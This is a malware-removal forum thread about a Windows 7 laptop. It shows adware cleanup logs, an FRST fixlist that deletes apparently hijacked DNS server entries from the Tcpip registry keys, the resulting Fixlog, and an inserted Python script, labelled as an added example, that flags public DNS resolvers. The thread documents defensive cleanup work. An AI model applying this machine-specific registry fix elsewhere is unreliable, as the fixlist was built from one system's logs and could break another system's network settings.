No malicious Chromium entries deleted.

*************************

::Tracing keys deleted
::Winsock settings cleared
::Additional Actions: 0



*************************

C:/AdwCleaner/AdwCleaner[S0].txt - [5788 B] - [2018/3/24 2:21:58]


########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt ##########

 

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 7 Home Premium x64
Ran by Tech 14 (Administrator) on Fri 03/23/2018 at 22:52:53.83
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 6

Successfully deleted: C:\Users\Tech 14\AppData\Local\{C0B2B26F-F0C4-412A-9273-A0A4AF11DCF1} (Empty Folder)
Successfully deleted: C:\Users\Tech 14\Documents\optimizer pro (Folder)
Successfully deleted: C:\windows\SysWOW64\sho2CBB.tmp (File)
Successfully deleted: C:\windows\SysWOW64\sho68B1.tmp (File)
Successfully deleted: C:\windows\SysWOW64\shoAC84.tmp (File)
Successfully deleted: C:\windows\SysWOW64\shoF2A3.tmp (File)



Registry: 2

Successfully deleted: HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Fri 03/23/2018 at 23:06:32.47
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



#4 nasdaq

nasdaq

  • Malware Response Team
  • 38,580 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:06:56 AM

Posted 25 March 2018 - 12:35 PM

Hi,

I could not uninstall

llEsss2pay (HKLM-x32\...\{82B558C7-2A69-D3D5-B65A-DCAB3B65AD02}) (Version: - less2pay)


The fix took care of the BHOs, the running processes, etc.

Any remaining issues with this computer?

#5 starblazers

starblazers
  • Topic Starter

  • Members
  • 56 posts
  • OFFLINE
  •  
  • Local time:06:56 AM

Posted 26 March 2018 - 09:41 PM

Right now, it appears to be behaving itself.

And I just spotted your earlier question from your first reply.  No, I have no idea what that IP address was, I didn't recognize it.

 

Also, I have created a new Administrator account for the laptop.  Would it be safe to erase the old one, or would I potentially need it to access certain programs that may not be available to my new account?



#6 nasdaq


Posted 27 March 2018 - 07:46 AM

Hi,
 

Also, I have created a new Administrator account for the laptop. Would it be safe to erase the old one, or would I potentially need it to access certain programs that may not be available to my new account?


I would work in the new profile for a month or two. If all the programs you use are working well then delete the old profile if you wish.
How to:
https://superuser.com/questions/63017/how-do-i-delete-a-user-profile-on-a-windows-7-machine-that-is-part-of-a-domain

===
 

No, I have no idea what that IP address was, I didn't recognize it.

More information on this IP.
https://www.bloomberg.com/research/stocks/private/snapshot.asp?privcapId=926617

If you wish to remove it run this fix.

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.
Please copy the entire contents of the code box below to a new file.
 
start


CreateRestorePoint:
CloseProcesses:

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\Parameters: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{28414285-8C2B-4927-8707-AA2B9B7FB204}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}: [DhcpNameServer] 199.203.131.151
Tcpip\..\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}: [DhcpNameServer] 199.203.131.151

cmd: ipconfig /flushdns
cmd: IPCONFIG /release
cmd: IPCONFIG /renew

Reboot:

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt); please post it in your reply.
===

Let me know of any problems.
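The fixlist in the post above targets DNS server values under `Tcpip\Parameters`: `NameServer` holds statically configured resolvers (which take precedence when set) and `DhcpNameServer` holds the ones last supplied by DHCP. As an added example, not part of the original post and not FRST's own code, this Python sketch parses those lines in the format shown in this thread and lists every resolver that is not a private, loopback or link-local address so it can be reviewed; the function names are hypothetical.

```python
import ipaddress
import re
from collections import defaultdict

# The seven Tcpip lines from the fixlist in this thread, copied verbatim.
FIXLIST_LINES = r"""
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\Parameters: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{28414285-8C2B-4927-8707-AA2B9B7FB204}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}: [DhcpNameServer] 199.203.131.151
Tcpip\..\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}: [DhcpNameServer] 199.203.131.151
"""

# Layout seen in the log: scope, then the value name in brackets, then the data.
LINE_RE = re.compile(
    r"^Tcpip\\(?P<scope>Parameters|\.\.\\Interfaces\\\{[0-9A-Fa-f-]{36}\}):\s*"
    r"\[(?P<value>DhcpNameServer|NameServer)\]\s+(?P<servers>.+)$"
)


def parse_tcpip_lines(text):
    """Return [(scope, value_name, [ip_address, ...])] for each Tcpip line."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a Tcpip DNS line
        servers = []
        # The registry value may separate addresses with spaces or commas.
        for token in re.split(r"[,\s]+", m["servers"].strip()):
            try:
                servers.append(ipaddress.ip_address(token))
            except ValueError:
                pass  # skip anything that is not an IP literal
        entries.append((m["scope"], m["value"], servers))
    return entries


def review_dns(text):
    """List resolvers outside private/loopback/link-local space for review."""
    findings = []
    for scope, value, servers in parse_tcpip_lines(text):
        origin = "static" if value == "NameServer" else "dhcp"
        for ip in servers:
            if ip.is_private or ip.is_loopback or ip.is_link_local:
                continue  # e.g. the home router at 192.168.1.254
            findings.append((scope, value, str(ip), origin))
    return findings


def resolvers_by_scope(findings):
    """Group findings as {resolver_ip: sorted list of scopes that use it}."""
    grouped = defaultdict(set)
    for scope, _value, ip, _origin in findings:
        grouped[ip].add(scope)
    return {ip: sorted(scopes) for ip, scopes in grouped.items()}


if __name__ == "__main__":
    for scope, value, ip, origin in review_dns(FIXLIST_LINES):
        print(f"{ip:<16} {origin:<6} {value:<14} {scope}")
```

A listed address is only a candidate for review: a public resolver set on purpose by the owner shows up the same way as one written by unwanted software.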

#7 starblazers


Posted 28 March 2018 - 08:41 PM

The laptop seemed slower than normal today when I tried to boot it up, and then it took forever for Chrome to load, but it didn't seem to redirect anything, it was just very slow in loading Chrome.

Fixlog as follows:

Fix result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Tech 14 (28-03-2018 19:51:21) Run:2
Running from C:\Users\Tech 14\Desktop
Loaded Profiles: Tech 14 (Available Profiles: Tech 14 & Meridian)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start


CreateRestorePoint:
CloseProcesses:

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\Parameters: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{28414285-8C2B-4927-8707-AA2B9B7FB204}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}: [DhcpNameServer] 199.203.131.151
Tcpip\..\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}: [DhcpNameServer] 199.203.131.151

cmd: ipconfig /flushdns
cmd: IPCONFIG /release
cmd: IPCONFIG /renew

Reboot:

End
*****************

Restore point was successfully created.
Processes closed successfully.
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\DhcpNameServer" => removed successfully
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer" => removed successfully
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{28414285-8C2B-4927-8707-AA2B9B7FB204}\\NameServer" => removed successfully
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}\\NameServer" => removed successfully
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}\\DhcpNameServer" => removed successfully
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}\\NameServer" => removed successfully
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}\\DhcpNameServer" => removed successfully

========= ipconfig /flushdns =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========


========= IPCONFIG /release =========


Windows IP Configuration

No operation can be performed on Bluetooth Network Connection while it has its media disconnected.
No operation can be performed on Local Area Connection while it has its media disconnected.

Mobile Broadband adapter Mobile Broadband Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Wireless LAN adapter Wireless Network Connection:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::b452:bcc0:c801:5e6b%15
   Default Gateway . . . . . . . . . :

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Ethernet adapter Local Area Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : triad.rr.com

Tunnel adapter isatap.{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter isatap.{EB149C09-0ED4-4B3D-A3A2-FCB4397AF082}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter isatap.triad.rr.com:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter isatap.Home:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

========= End of CMD: =========


========= IPCONFIG /renew =========


Windows IP Configuration

No operation can be performed on Mobile Broadband Connection while it has its media disconnected.
No operation can be performed on Bluetooth Network Connection while it has its media disconnected.
No operation can be performed on Local Area Connection while it has its media disconnected.

Mobile Broadband adapter Mobile Broadband Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Wireless LAN adapter Wireless Network Connection:

   Connection-specific DNS Suffix  . : Home
   Link-local IPv6 Address . . . . . : fe80::b452:bcc0:c801:5e6b%15
   IPv4 Address. . . . . . . . . . . : 192.168.1.19
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.254

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Ethernet adapter Local Area Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : triad.rr.com

Tunnel adapter isatap.{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter isatap.{EB149C09-0ED4-4B3D-A3A2-FCB4397AF082}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter isatap.triad.rr.com:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter isatap.Home:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

========= End of CMD: =========



The system needed a reboot.

==== End of Fixlog 19:51:55 ====



#8 nasdaq


Posted 29 March 2018 - 07:23 AM

Hi,

Reset Chrome one more time.

Restart the computer and Chrome.

How is it now?

#9 nasdaq


Posted 04 April 2018 - 07:48 AM

Hi,

If all is well.

To learn more about how to protect yourself while on the internet, read this little guide: best security practices, keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/


https://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/
Simple and easy ways to keep your computer safe and secure on the Internet.
===



